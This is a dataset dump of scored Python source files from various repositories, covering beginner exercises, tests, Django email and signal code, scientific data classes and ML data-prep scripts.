max_stars_repo_path
stringlengths
3
269
max_stars_repo_name
stringlengths
4
119
max_stars_count
int64
0
191k
id
stringlengths
1
7
content
stringlengths
6
1.05M
score
float64
0.23
5.13
int_score
int64
0
5
Python/python-practice/chapter5-if/toppints.py
jiaoqiyuan/Tests
0
12796551
<filename>Python/python-practice/chapter5-if/toppints.py requested_topping = 'mushrooms' if requested_topping != 'anchovies': print("Hold the anchovies!") answer = 17 if answer != 42: print("That is not the correct answer. Please try again!") requested_toppings = ['mushrooms', 'extra cheese'] if 'mushrooms' in requested_toppings: print("Adding mushrooms.") if 'pepperoni' in requested_toppings: print("Adding pepperoni.") if 'extra cheese' in requested_toppings: print("Adding extra cheese.") print("\nFinished making you pizza!") requested_toppings = ['mushrooms', 'green peppers', 'extra cheese'] for requested_topping in requested_toppings: if requested_topping == 'green peppers': print("Sorry, we are out of green peppers fight now.") else: print("Adding " + requested_topping + ".") print("\nFinished making your pizza!") requested_toppings = [] if requested_toppings: for requested_topping in requested_toppings: print("Adding " + requested_topping + ".") print("\nFinished making your pizza!") else: print("Are you sure you want a pizza?") avaliable_toppings = ['mushrooms', 'olives', 'green peppers', 'pepperoni', 'pineapple', 'extra cheese'] requested_toppings = ['mushrooms', 'french fries', 'extra cheese'] for requested_topping in requested_toppings: if requested_topping in avaliable_toppings: print("Adding " + requested_topping + ".") else: print("Sorry, we don't have " + requested_topping + ".") print("\nFinished making your pizza!")
4.375
4
tools/initialcompdata/abundngc5286.py
lukeshingles/evelchemevol
2
12796552
from abundsolar import elsolarlogepsilon zfactor = 10 ** -1.92 # mean of s-poor population in NGC5286 # from Marino et al. (2015) 2015MNRAS.450..815M # [Fe/H] = -1.92 # log X/Fe = [X/Fe] + log(X/Fe)_solar targetlogxtofe = { 'o': 0.58 + elsolarlogepsilon['o'] - elsolarlogepsilon['fe'], 'na': 0.18 + elsolarlogepsilon['na'] - elsolarlogepsilon['fe'], 'y': -0.04 +elsolarlogepsilon['y'] - elsolarlogepsilon['fe'], 'zr': 0.17 + elsolarlogepsilon['zr'] - elsolarlogepsilon['fe'], 'ba': 0.03 + elsolarlogepsilon['ba'] - elsolarlogepsilon['fe'], 'la': 0.29 + elsolarlogepsilon['la'] - elsolarlogepsilon['fe'], 'ce': 0.24 + elsolarlogepsilon['ce'] - elsolarlogepsilon['fe'], 'pr': 0.38 + elsolarlogepsilon['pr'] - elsolarlogepsilon['fe'], 'nd': 0.20 + elsolarlogepsilon['nd'] - elsolarlogepsilon['fe'] }
1.875
2
log/basic_log.py
nkzmsb/howto
0
12796553
<filename>log/basic_log.py import time # print("===start: not use logging===") # # logレベルの設定 # MODE = "INFO" # for i in range(5): # 適当な繰り返しの処理を再現 # # 適当な処理・処理時間を再現 # a = i # b = i * 2 # c = a + b # time.sleep(1) # # if MODE == "DEBUG" or MODE == "INFO": # print("a:{}, b:{}".format(a,b)) # if MODE == "INFO": # print("c:{}".format(c)) print("===start: use logging===") import logging # logレベルの設定 logging.basicConfig(level=logging.DEBUG , filename="log/basic_log.log" # This kwarg is not necessary when displaying imfomation on the screen ) for i in range(5): # 適当な繰り返しの処理を再現 # 適当な処理・処理時間を再現 a = i b = i * 2 c = a + b time.sleep(1) # DEBUGレベルの処理 logging.debug("a:{}, b:{}".format(a,b)) # INFOレベルの処理 logging.info("c:{}".format(c))
3.71875
4
wqxlib/wqx_v3_0/OrganizationAddress.py
FlippingBinary/wqxlib-python
0
12796554
from yattag import Doc from .SimpleContent import ( AddressText, AddressTypeName, CountryCode, CountyCode, LocalityName, PostalCode, StateCode, SupplementalAddressText, ) class OrganizationAddress: """ The physical address of an organization. """ __addressTypeName: AddressTypeName __addressText: AddressText __supplementalAddressText: SupplementalAddressText __localityName: LocalityName __stateCode: StateCode __postalCode: PostalCode __countryCode: CountryCode __countyCode: CountyCode def __init__( self, o: dict = None, *, addressTypeName: AddressTypeName = None, addressText: AddressText = None, supplementalAddressText: SupplementalAddressText = None, localityName: LocalityName = None, stateCode: StateCode = None, postalCode: PostalCode = None, countryCode: CountryCode = None, countyCode: CountyCode = None ): if isinstance(o, OrganizationAddress): # Assign attributes from object without typechecking self.__addressTypeName = o.addressTypeName self.__addressText = o.addressText self.__supplementalAddressText = o.supplementalAddressText self.__localityName = o.localityName self.__stateCode = o.stateCode self.__postalCode = o.postalCode self.__countryCode = o.countryCode self.__countyCode = o.countyCode elif isinstance(o, dict): # Assign attributes from dictionary with typechecking self.addressTypeName = o.get("addressTypeName") self.addressText = o.get("addressText") self.supplementalAddressText = o.get("supplementalAddressText") self.localityName = o.get("localityName") self.stateCode = o.get("stateCode") self.postalCode = o.get("postalCode") self.countryCode = o.get("countryCode") self.countyCode = o.get("countyCode") else: # Assign attributes from named keywords with typechecking self.addressTypeName = addressTypeName self.addressText = addressText self.supplementalAddressText = supplementalAddressText self.localityName = localityName self.stateCode = stateCode self.postalCode = postalCode self.countryCode = countryCode self.countyCode = countyCode @property def addressTypeName(self) -> AddressTypeName: return self.__addressTypeName @addressTypeName.setter def addressTypeName(self, val: AddressTypeName) -> None: self.__addressTypeName = None if val is None else AddressTypeName(val) @property def addressText(self) -> AddressText: return self.__addressText @addressText.setter def addressText(self, val: AddressText) -> None: self.__addressText = None if val is None else AddressText(val) @property def supplementalAddressText(self) -> SupplementalAddressText: return self.__supplementalAddressText @supplementalAddressText.setter def supplementalAddressText(self, val: SupplementalAddressText) -> None: self.__supplementalAddressText = ( None if val is None else SupplementalAddressText(val) ) @property def localityName(self) -> LocalityName: return self.__localityName @localityName.setter def localityName(self, val: LocalityName) -> None: self.__localityName = None if val is None else LocalityName(val) @property def stateCode(self) -> StateCode: return self.__stateCode @stateCode.setter def stateCode(self, val: StateCode) -> None: self.__stateCode = None if val is None else StateCode(val) @property def postalCode(self) -> PostalCode: return self.__postalCode @postalCode.setter def postalCode(self, val: PostalCode) -> None: self.__postalCode = None if val is None else PostalCode(val) @property def countryCode(self) -> CountryCode: return self.__countryCode @countryCode.setter def countryCode(self, val: CountryCode) -> None: self.__countryCode = None if val is None else CountryCode(val) @property def countyCode(self) -> CountyCode: return self.__countyCode @countyCode.setter def countyCode(self, val: CountyCode) -> None: self.__countyCode = None if val is None else CountyCode(val) def generateXML(self, name: str = "OrganizationAddress") -> str: doc = Doc() line = doc.line tag = doc.tag with tag(name): if self.__addressTypeName is not None: line("AddressTypeName", self.__addressTypeName) if self.__addressText is not None: line("AddressText", self.__addressText) if self.__supplementalAddressText is not None: line("SupplementalAddressText", self.__supplementalAddressText) if self.__localityName is not None: line("LocalityName", self.__localityName) if self.__stateCode is not None: line("StateCode", self.__stateCode) if self.__postalCode is not None: line("PostalCode", self.__postalCode) if self.__countryCode is not None: line("CountryCode", self.__countryCode) if self.__countyCode is not None: line("CountyCode", self.__countyCode) return doc.getvalue()
2.765625
3
tests/flag_test.py
harrybrwn/dispatch
0
12796555
<filename>tests/flag_test.py import pytest from pytest import raises import sys from os.path import dirname sys.path.insert(0, dirname(dirname(__file__))) from typing import List, Set, Dict, Sequence, Mapping from dispatch import command from dispatch.flags import Option, _from_typing_module, _is_iterable class AType: def __init__(self, val): self.val = val def testTypeParsing(): o = Option('o', List[int]) o.setval('[1,2,3,4]') assert isinstance(o.value, list) for got, want in zip(o.value, [1, 2, 3, 4]): assert isinstance(got, int) assert isinstance(want, int) assert got == want o = Option('o', list) o.setval('[1,2,3,4]') assert isinstance(o.value, list) for got, want in zip(o.value, [1, 2, 3, 4]): assert isinstance(got, str) assert isinstance(want, int) assert int(got) == want assert got == str(want) o = Option('o', Set[float]) o.setval('[1.5,2.6,3.7,4.8]') assert isinstance(o.value, set) for got, want in zip(o.value, [1.5, 2.6, 3.7, 4.8]): assert isinstance(got, float) assert isinstance(want, float) assert got == want assert got == want o = Option('o', Dict[str, int]) o.setval('{one:1,two:2,three:3}') assert isinstance(o.value, dict) for k, v in o.value.items(): assert isinstance(k, str) assert isinstance(v, int) opt = Option('num', complex) opt.setval('5+9j') assert opt.value == complex(5, 9) opt.setval(complex(7, 2)) assert opt.value == complex(7, 2) opt.setval(6.7) assert opt.value == complex(6.7, 0) opt = Option('type', AType) opt.setval('hello') assert isinstance(opt.value, AType) assert opt.value.val == 'hello' def testBadTypeParsing(): o = Option('outout', Dict[str, float]) opt = Option('num', complex) @command def f(keys: Dict[str, float]): pass with raises(ValueError): o.setval('{one:1.0,two:2.5,three:the third number,four:4}') opt.setval('4+3i') f(['--keys', '{one:1,two:this is the number two}']) def testIsIterable(): assert _is_iterable(str) assert _is_iterable(list) assert _is_iterable(dict) assert _is_iterable(set) assert _is_iterable(List) assert _is_iterable(Dict) assert _is_iterable(Sequence) assert _is_iterable(Mapping) class A: pass # noqa assert not _is_iterable(int) assert not _is_iterable(float) assert not _is_iterable(A) assert _is_iterable([1, 2, 3]) def testFromTypingModule(): assert _from_typing_module(List) assert _from_typing_module(Sequence) assert _from_typing_module(Dict[int, str]) assert not _from_typing_module(list) assert not _from_typing_module(int) assert not _from_typing_module(dict) class A: pass # noqa assert not _from_typing_module(A)
2.71875
3
JellyBot/api/ar/__init__.py
RaenonX/Jelly-Bot-API
5
12796556
from .add import AutoReplyAddView, AutoReplyAddExecodeView from .validate import ContentValidationView from .tag import AutoReplyTagPopularityQueryView
0.902344
1
tests/test_filename.py
mverbowski/beets-copyartifacts
0
12796557
import os import sys from helper import CopyArtifactsTestCase from beets import config class CopyArtifactsFilename(CopyArtifactsTestCase): """ Tests to check handling of artifacts with filenames containing unicode characters """ def setUp(self): super(CopyArtifactsFilename, self).setUp() self._set_import_dir() self.album_path = os.path.join(self.import_dir, 'the_album') os.makedirs(self.album_path) self._setup_import_session(autotag=False) config['copyartifacts']['extensions'] = '.file' def test_import_dir_with_unicode_character_in_artifact_name_copy(self): open(os.path.join(self.album_path, u'\xe4rtifact.file'), 'a').close() medium = self._create_medium(os.path.join(self.album_path, 'track_1.mp3'), 'full.mp3') self.import_media = [medium] self._run_importer() self.assert_in_lib_dir('Tag Artist', 'Tag Album', u'\xe4rtifact.file') def test_import_dir_with_unicode_character_in_artifact_name_move(self): config['import']['move'] = True open(os.path.join(self.album_path, u'\xe4rtifact.file'), 'a').close() medium = self._create_medium(os.path.join(self.album_path, 'track_1.mp3'), 'full.mp3') self.import_media = [medium] self._run_importer() self.assert_in_lib_dir('Tag Artist', 'Tag Album', u'\xe4rtifact.file') def test_import_dir_with_illegal_character_in_album_name(self): config['paths']['ext:file'] = unicode('$albumpath/$artist - $album') # Create import directory, illegal filename character used in the album name open(os.path.join(self.album_path, u'artifact.file'), 'a').close() medium = self._create_medium(os.path.join(self.album_path, 'track_1.mp3'), 'full.mp3', 'Tag Album?') self.import_media = [medium] self._run_importer() self.assert_in_lib_dir('Tag Artist', 'Tag Album_', u'Tag Artist - Tag Album_.file')
2.609375
3
jina_commons/logging.py
chuangfengwang/jina-commons
5
12796558
import functools import os import time from typing import List from jina import DocumentArray from jina.logging.logger import JinaLogger from jina.enums import LogVerbosity def _get_non_empty_fields_doc_array(docs: DocumentArray) -> List[str]: non_empty_fields = list(docs[0].non_empty_fields) for doc in docs[:1]: for field in non_empty_fields: if field not in doc.non_empty_fields: non_empty_fields.pop(field) return non_empty_fields def add_request_logger(logger): """ Add logging functionality to a request function. Only shows logs for `JINA_LOG_LEVEL` > info. You can set this as an env variable before starting your `Jina` application. Example usages: >>> from jina import Executor, requests >>> my_logger = JinaLogger('MyExecLogger') >>> >>> class MyExec(Executor): >>> @requests >>> @add_request_logger(my_logger) >>> def index(self, docs, parameters, **kwargs): >>> ... :param logger: The logger you want to use """ def decorator(function): @functools.wraps(function) def wrapper(self, docs, parameters, **kwargs): verbose_level = os.environ.get('JINA_LOG_LEVEL', None) verbose_level = LogVerbosity.from_string(verbose_level) if verbose_level else None if verbose_level is None or verbose_level > LogVerbosity.DEBUG: return function(self, docs, parameters, **kwargs) if not docs: logger.debug('Docs is None. Nothing to monitor') return function(self, docs, parameters, **kwargs) logger.debug(f'📄 Received request containing {len(docs)} documents.') logger.debug(f'📕 Received parameters dictionary: {parameters}') if len(docs) > 0: non_empty_fields = _get_non_empty_fields_doc_array(docs) logger.debug(f'🏷 Non-empty fields {non_empty_fields}') start_time = time.time() result = function(self, docs, parameters, **kwargs) end_time = time.time() logger.debug(f'⏱ Elapsed time for request {end_time - start_time} seconds.') return result return wrapper return decorator
2.375
2
otscrape/core/extractor/file/file.py
SSripilaipong/otscrape
0
12796559
<gh_stars>0 from otscrape.core.base.extractor import Extractor from otscrape.core.loader.file import LineObject class FileContent(Extractor): def __init__(self, target=None, *, project=True, replace_error=None, **kwargs): super().__init__(target=target, project=project, replace_error=replace_error) self.kwargs = kwargs def extract(self, page, cache): target = self.target x = page[target] assert isinstance(x, (LineObject,)) return x.content class FileName(Extractor): def __init__(self, target=None, *, project=True, replace_error=None, **kwargs): super().__init__(target=target, project=project, replace_error=replace_error) self.kwargs = kwargs def extract(self, page, cache): target = self.target x = page[target] assert isinstance(x, (LineObject,)) return x.filename
2.3125
2
kungfucms/apps/account/signals.py
youngershen/kungfucms
0
12796560
# PROJECT : kungfucms # TIME : 2020/6/9 12:54 # AUTHOR : <NAME> # EMAIL : <EMAIL> # PHONE : 13811754531 # WECHAT : 13811754531 # https://github.com/youngershen from django.core.signals import request_started, \ request_finished from django.dispatch import Signal, receiver before_sign_in = Signal(providing_args=["toppings", "size"]) after_sign_in = Signal(providing_args=["toppings", "size"]) sign_in_post_permission = Signal(providing_args=["toppings", "size"]) @receiver(request_started) def before_request(sender, **kwargs): pass @receiver(request_finished) def after_request(sender, **kwargs): pass
1.929688
2
Topics/Algorithms in Python/Last index of max/main.py
soukalli/jetbrain-accademy
0
12796561
def last_indexof_max(numbers): # write the modified algorithm here index = 0 for i in range(len(numbers)): if numbers[i] >= numbers[index]: index = i return index
3.890625
4
aula2/exercicio2.py
ArseniumGX/bluemer-modulo1-python
0
12796562
<filename>aula2/exercicio2.py """ 02 - Qual o valor do troco? Defina uma variável para o valor de uma compra que custou R$100,98; Defina uma variável para o valor que o cliente pagou R$150,00; Defina uma variável que calcula o valor do troco e exiba-o no console com o valor final arredondado. """ valor_compra = 100.98 valor_pago = 150.00 troco = valor_pago - valor_compra print(f'O seu troco é: R$ {troco:.2f}')
2.984375
3
model/contact.py
dmi-vor/python_training
0
12796563
<reponame>dmi-vor/python_training<gh_stars>0 from sys import maxsize class Contact: def __init__(self, firstname=None, middlename=None, lastname=None, id=None, nickname=None, title=None, company=None, address=None, homephone=None, mobilephone=None, workphone=None, fax=None, email_1=None, email_2=None, email_3=None, homepage=None, address_2=None, homephone2=None, notes=None, all_emails_from_homepage=None, all_phones_from_homepage=None): self.firstname = firstname self.middlename = middlename self.lastname = lastname self.nickname = nickname self.title = title self.company = company self.address = address self.homephone = homephone self.mobilephone = mobilephone self.workphone = workphone self.fax = fax self.email_1 = email_1 self.email_2 = email_2 self.email_3 = email_3 self.homepage = homepage self.address_2 = address_2 self.homephone2 = homephone2 self.notes = notes self.all_emails_from_homepage = all_emails_from_homepage self.all_phones_from_homepage = all_phones_from_homepage self.id = id def __repr__(self): return "%s:%s:%s" % (self.id, self.firstname, self.lastname) def __eq__(self, other): return (self.id is None or other.id is None or self.id == other.id) and self.lastname == other.lastname and self.firstname == other.firstname def id_or_max(self): if self.id: return int(self.id) else: return maxsize
2.765625
3
reo/src/load_profile_chiller_thermal.py
akuam1/REopt_Lite_API
0
12796564
<reponame>akuam1/REopt_Lite_API<gh_stars>0 from reo.src.load_profile import BuiltInProfile import os import json import pandas as pd import numpy as np from datetime import datetime from reo.utilities import TONHOUR_TO_KWHT class LoadProfileChillerThermal(BuiltInProfile): """ Chiller Load Profiles based on CRB defined load shapes or user-defined input """ with open(os.path.join(BuiltInProfile.library_path, 'reference_cooling_kwh.json'), 'r') as f: annual_loads = json.loads(f.read()) builtin_profile_prefix = "Cooling8760_norm_" electric_chiller_cop_defaults = { "convert_elec_to_thermal": 4.55, "less_than_100_tons": 4.40, "greater_than_100_tons": 4.69} @staticmethod def get_default_cop(max_thermal_factor_on_peak_load, max_kw=None, max_kwt=None, max_ton=None): if max_ton is not None: max_cooling_load_tons = max_ton elif max_kwt is not None: max_cooling_load_tons = max_kwt / TONHOUR_TO_KWHT elif max_kw is not None: max_cooling_load_tons = max_kw / TONHOUR_TO_KWHT * \ LoadProfileChillerThermal.electric_chiller_cop_defaults["convert_elec_to_thermal"] else: raise Exception("Please supply a max_ton, max_kwt or max_kw value") estimated_max_chiller_thermal_capacity_tons = max_cooling_load_tons * max_thermal_factor_on_peak_load if estimated_max_chiller_thermal_capacity_tons < 100.0: return LoadProfileChillerThermal.electric_chiller_cop_defaults["less_than_100_tons"] else: return LoadProfileChillerThermal.electric_chiller_cop_defaults["greater_than_100_tons"] def __init__(self, dfm=None, total_electric_load_list=[], latitude=None, longitude=None, nearest_city=None, time_steps_per_hour=None, year=None, chiller_cop=None, max_thermal_factor_on_peak_load=None, **kwargs): """ :param dfm: (object) data_manager to which this load object will be added :param total_electric_load_list: (array) electric LoadProfile object resulting from parsed inputs :param latitude: (float) site latitude :param longitude: (float) site longitude :param nearest_city: (str) site nearest_city :param time_steps_per_hour: (int) simulation time resolution :param year: (int) electric LoadProfile year :param chiller_cop: (float or int) Coefficient of Performance for Chiller :param max_thermal_factor_on_peak_load: (float or int) maximum thermal factor on peak load for the Chiller :param kwargs: (dict) Chiller specific inputs as defined in reo/nested_inputs """ self.nearest_city = nearest_city self.latitude = latitude self.longitude = longitude self.time_steps_per_hour = time_steps_per_hour self.year = year # Default electric_load_list to None, used later to see if we need to covert kWh to kWht electric_load_list = None # Use highest resultion/quality input first if kwargs.get('loads_ton') is not None: self.load_list = [i*TONHOUR_TO_KWHT for i in kwargs['loads_ton']] # DOE Reference building profile are used if there is a reference name provided elif kwargs.get('doe_reference_name'): doe_reference_name = kwargs.get('doe_reference_name') or [] combine_loadlist = [] for i in range(len(doe_reference_name)): # Monthly loads can only be used to scale a non-hybrid profile kwargs['monthly_totals_energy'] = kwargs.get("monthly_tonhour") if len(doe_reference_name)>1: kwargs['monthly_totals_energy'] = None kwargs['annual_energy'] = None # Annual loads are used in place of percent shares if provided if kwargs.get("annual_tonhour") is not None: kwargs['annual_energy'] = kwargs["annual_tonhour"] kwargs['annual_loads'] = self.annual_loads kwargs['builtin_profile_prefix'] = self.builtin_profile_prefix kwargs['latitude'] = latitude kwargs['longitude'] = longitude kwargs['doe_reference_name'] = doe_reference_name[i] kwargs['nearest_city'] = nearest_city kwargs['time_steps_per_hour'] = time_steps_per_hour kwargs['year'] = year super(LoadProfileChillerThermal, self).__init__(**kwargs) if time_steps_per_hour > 1: partial_load_list = np.concatenate([[x] * time_steps_per_hour \ for x in self.built_in_profile]) else: partial_load_list = self.built_in_profile combine_loadlist.append(list(partial_load_list)) # In the case where the user supplies a list of doe_reference_names and percent shares # for consistency we want to act as if we had scaled the partial load to the total site # load which was unknown at the start of the loop above. This scalar makes it such that # when the percent shares are later applied that the total site load will be the sum # of the default annual loads for this location if (len(doe_reference_name) > 1) and kwargs['annual_energy'] is None: total_site_load = sum([sum(l) for l in combine_loadlist]) for i, load in enumerate(combine_loadlist): actual_percent_of_site_load = sum(load)/total_site_load scalar = 1.0 / actual_percent_of_site_load combine_loadlist[i] = list(np.array(load)* scalar) #Apply the percent share of annual load to each partial load if (len(doe_reference_name) > 1): for i, load in enumerate(combine_loadlist): combine_loadlist[i] = list(np.array(load) * (kwargs.get("percent_share")[i]/100.0)) # Aggregate total hybrid load hybrid_loadlist = list(np.sum(np.array(combine_loadlist), 0)) if (kwargs.get("annual_tonhour") is not None) or (kwargs.get("monthly_tonhour") is not None): #load_list is always expected to be in units of kWt self.load_list = [i*TONHOUR_TO_KWHT for i in hybrid_loadlist] else: electric_load_list = hybrid_loadlist # If no doe_reference_name or loads_ton provided, scale by a fraction of electric load elif kwargs.get('loads_fraction') is not None: electric_load_list = list(np.array(kwargs['loads_fraction']) * np.array(total_electric_load_list)) elif kwargs.get('monthly_fraction') is not None: month_series = pd.date_range(datetime(year,1,1), datetime(year+1,1,1), periods=8760*time_steps_per_hour) electric_load_list = [total_electric_load_list[i] * kwargs['monthly_fraction'][month-1] \ for i, month in enumerate(month_series.month)] elif kwargs.get('annual_fraction') is not None: electric_load_list = [kwargs['annual_fraction'] * kw for kw in total_electric_load_list] #Calculate COP based on kwth load or kw load (if not user-entered) self.chiller_cop = chiller_cop # Update COP based on estimated max chiller load if self.chiller_cop is None: if electric_load_list is not None: #This is a static method so it can be accessible in views.py self.chiller_cop = LoadProfileChillerThermal.get_default_cop( max_kw=max(electric_load_list), max_thermal_factor_on_peak_load=max_thermal_factor_on_peak_load) else: #This is a static method so it can be accessible in views.py self.chiller_cop = LoadProfileChillerThermal.get_default_cop( max_kwt=max(self.load_list), max_thermal_factor_on_peak_load=max_thermal_factor_on_peak_load) # load_list is always expected to be in units of kWth if electric_load_list is not None: self.load_list = [i*self.chiller_cop for i in electric_load_list] self.annual_kwht = int(round(sum(self.load_list),0)) if dfm is not None: dfm.add_load_chiller_thermal(self)
2.484375
2
ac/messagepgp.py
juga0/djac
0
12796565
<reponame>juga0/djac # -*- coding: utf-8 -*- # vim:ts=4:sw=4:expandtab # Copyright 2017 juga (juga at riseup dot net), under MIT license. """Extend Django email classes for MIME multipart/pgp-encrypted type messages. """ __all__ = ['EmailMessageEnc', 'EmailMessagePGP'] from django.conf import settings from django.core.mail.message import ( EmailMessage, MIMEMixin, forbid_multi_line_headers, force_text, make_msgid, formatdate, DNS_NAME) from emailpgp.mime.multipartpgp import MIMEMultipartPGP from autocrypt.pgpymessage import gen_ac_header_dict class SafeMIMEMultipart(MIMEMixin, MIMEMultipartPGP): def __init__(self, _data=None, _subtype='encrypted', boundary=None, encoding=None, **_params): self.encoding = encoding MIMEMultipartPGP.__init__(self, _data, boundary, **_params) def __setitem__(self, name, val): name, val = forbid_multi_line_headers(name, val, self.encoding) MIMEMultipartPGP.__setitem__(self, name, val) class EmailMessageEnc(EmailMessage): def message(self, msg): self.msg = msg class EmailMessagePGP(EmailMessage): """A container for encrypted email information.""" content_subtype = 'encrypted' mixed_subtype = '' def message(self): encoding = self.encoding or settings.DEFAULT_CHARSET msg = MIMEMultipartPGP(self.body) # FIXME: attachments # msg = self._create_message(msg) msg['Subject'] = self.subject msg['From'] = self.extra_headers.get('From', self.from_email) msg['To'] = self.extra_headers.get('To', ', '.join(map(force_text, self.to))) if self.cc: msg['Cc'] = ', '.join(map(force_text, self.cc)) if self.reply_to: msg['Reply-To'] = self.extra_headers.get( 'Reply-To', ', '.join(map(force_text, self.reply_to))) # Email header names are case-insensitive (RFC 2045), so we have to # accommodate that when doing comparisons. header_names = [key.lower() for key in self.extra_headers] if 'date' not in header_names: # formatdate() uses stdlib methods to format the date, which use # the stdlib/OS concept of a timezone, however, Django sets the # TZ environment variable based on the TIME_ZONE setting which # will get picked up by formatdate(). msg['Date'] = formatdate(localtime=settings.EMAIL_USE_LOCALTIME) if 'message-id' not in header_names: # Use cached DNS_NAME for performance msg['Message-ID'] = make_msgid(domain=DNS_NAME) for name, value in self.extra_headers.items(): # From and To are already handled if name.lower() in ('from', 'to'): continue msg[name] = value return msg def EmailMessagePGPAC(EmailMessagePGP): def __init__(self, subject='', body='', from_email=None, to=None, bcc=None, connection=None, attachments=None, headers=None, cc=None, reply_to=None, keydata=None, pe=None): super(EmailMessagePGPAC, self).__init__( subject, body, from_email, to, bcc, connection, attachments, headers, cc, reply_to) self.extra_headers = self.extra_headers.update( gen_ac_header_dict(to, keydata, pe))
2.140625
2
lib/googlecloudsdk/command_lib/dataproc/batches/sparksql_batch_factory.py
google-cloud-sdk-unofficial/google-cloud-sdk
2
12796566
# -*- coding: utf-8 -*- # # Copyright 2021 Google LLC. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Factory class for SparkSqlBatch message.""" from __future__ import absolute_import from __future__ import division from __future__ import unicode_literals from apitools.base.py import encoding from googlecloudsdk.command_lib.dataproc import flags from googlecloudsdk.command_lib.dataproc import local_file_uploader class SparkSqlBatchFactory(object): """Factory class for SparkSqlBatch message.""" def __init__(self, dataproc): """Factory class for SparkSqlBatch message. Args: dataproc: A Dataproc instance. """ self.dataproc = dataproc def UploadLocalFilesAndGetMessage(self, args): """Uploads local files and creates a SparkSqlBatch message. Uploads user local files and change the URIs to local files to uploaded URIs. Creates a SparkSqlBatch message. Args: args: Parsed arguments. Returns: A SparkSqlBatch message instance. Raises: AttributeError: Bucket is required to upload local files, but not specified. """ kwargs = {} dependencies = {} # Upload requires a list. dependencies['queryFileUri'] = [args.SQL_SCRIPT] if args.jar_files: dependencies['jarFileUris'] = args.jar_files if args.jars: dependencies['jarFileUris'] = args.jars params = None if args.script_variables: params = args.script_variables elif args.vars: params = args.vars if params: kwargs['queryVariables'] = encoding.DictToAdditionalPropertyMessage( params, self.dataproc.messages.SparkSqlBatch.QueryVariablesValue, sort_items=True) if local_file_uploader.HasLocalFiles(dependencies): bucket = args.deps_bucket if args.deps_bucket is not None else args.bucket if not bucket: raise AttributeError('--deps-bucket was not specified.') dependencies = local_file_uploader.Upload(args.bucket, dependencies) # Move main SQL script out of the list. dependencies['queryFileUri'] = dependencies['queryFileUri'][0] # Merge the dictionaries first for compatibility. kwargs.update(dependencies) return self.dataproc.messages.SparkSqlBatch(**kwargs) def AddArguments(parser): flags.AddMainSqlScript(parser) flags.AddJarFiles(parser) flags.AddSqlScriptVariables(parser) # Cloud Storage bucket to upload workload dependencies. # It is required until we figure out a place to upload user files. flags.AddBucket(parser)
2.125
2
data_prep_step/BERT_PYTORCH/data_prep_bert_pytorch.py
sampathkumaran90/pytorch-pipeline
0
12796567
<reponame>sampathkumaran90/pytorch-pipeline<filename>data_prep_step/BERT_PYTORCH/data_prep_bert_pytorch.py import shutil from collections import defaultdict import numpy as np import pandas as pd import torch import torch.nn.functional as F from sklearn.model_selection import train_test_split from torch import nn from torch.utils.data import Dataset, DataLoader from transformers import ( BertModel, BertTokenizer, AdamW ) import argparse import os from tqdm import tqdm import requests from torchtext.utils import download_from_url, extract_archive from torchtext.datasets.text_classification import URLS import sys import argparse import logging def run_pipeline(input_options): """ This method downloads the dataset and extract it along with the vocab file :param input_options: Input arg parameters """ dataset_tar = download_from_url( URLS["AG_NEWS"], root=input_options["output"]) extracted_files = extract_archive(dataset_tar) if not os.path.isfile(input_options["VOCAB_FILE"]): filePointer = requests.get( input_options["VOCAB_FILE_URL"], allow_redirects=True) if filePointer.ok: with open(input_options["VOCAB_FILE"], "wb") as f: f.write(filePointer.content) else: raise RuntimeError("Error in fetching the vocab file") def PrintOptions(options): """ Logging for debugging """ for a in options.items(): print(a) def run_pipeline_component(options): """ Method called from entry point to execute the pipeline """ print("Running data prep job from container") logging.getLogger().setLevel(logging.INFO) PrintOptions(options) run_pipeline( options ) # if __name__ == "__main__": # run_pipeline_component({ # "output": "./", # "VOCAB_FILE": "bert_base_uncased_vocab.txt", # "VOCAB_FILE_URL": "https://s3.amazonaws.com/models.huggingface.co/bert/bert-base-uncased-vocab.txt" # })
2.671875
3
test.py
12beesinatrenchcoat/yt-playlist-discord-webhook
2
12796568
<filename>test.py<gh_stars>1-10 # Unit tests, I guess. import unittest import typing import main # A test playlist created by myself to test various features of the script. # It contains five videos, added by two different users, # and some videos don't have maxres thumbnails. # This playlist shouldn't be changed. TEST_PLAYLIST: typing.Final = 'PLB2AcRG34VQWlArTnlLR98RZeOnep8-Zb' # Testing functions revolving around YouTube and video filtering. class TestVideoFunctions(unittest.TestCase): def test_get_playlist_items(self): r = main.get_playlist_items(TEST_PLAYLIST) self.assertEqual(len(r['items']), 5) def test_filter_items_by_timestamp(self): r = main.get_playlist_items(TEST_PLAYLIST) filtered = main.filter_playlist_items_by_timestamp(r, 1617985920) self.assertEqual(len(filtered), 2) # Not a test, but used in tests below. def get_playlist_item_embed(pos: int): r = main.get_playlist_items(TEST_PLAYLIST) playlist_item = r['items'][pos] epoch = main.iso_string_to_epoch(playlist_item ['snippet']['publishedAt']) playlist_item['snippet']['publishedAt'] = epoch embed = main.video_info_to_embed(playlist_item) return embed # Testing stuff with the Discord Embeds. class TestEmbeds(unittest.TestCase): def test_maxres_thumbnail(self): embed = get_playlist_item_embed(1) self.assertRegex(embed.thumbnail['url'], '(maxresdefault)') def test_hq_thumbnail_when_no_maxres(self): embed = get_playlist_item_embed(2) self.assertRegex(embed.thumbnail['url'], '(hqdefault)') if __name__ == '__main__': unittest.main()
2.71875
3
src/main/python/imschrm/hrm.py
sandflow/imscHRM
3
12796569
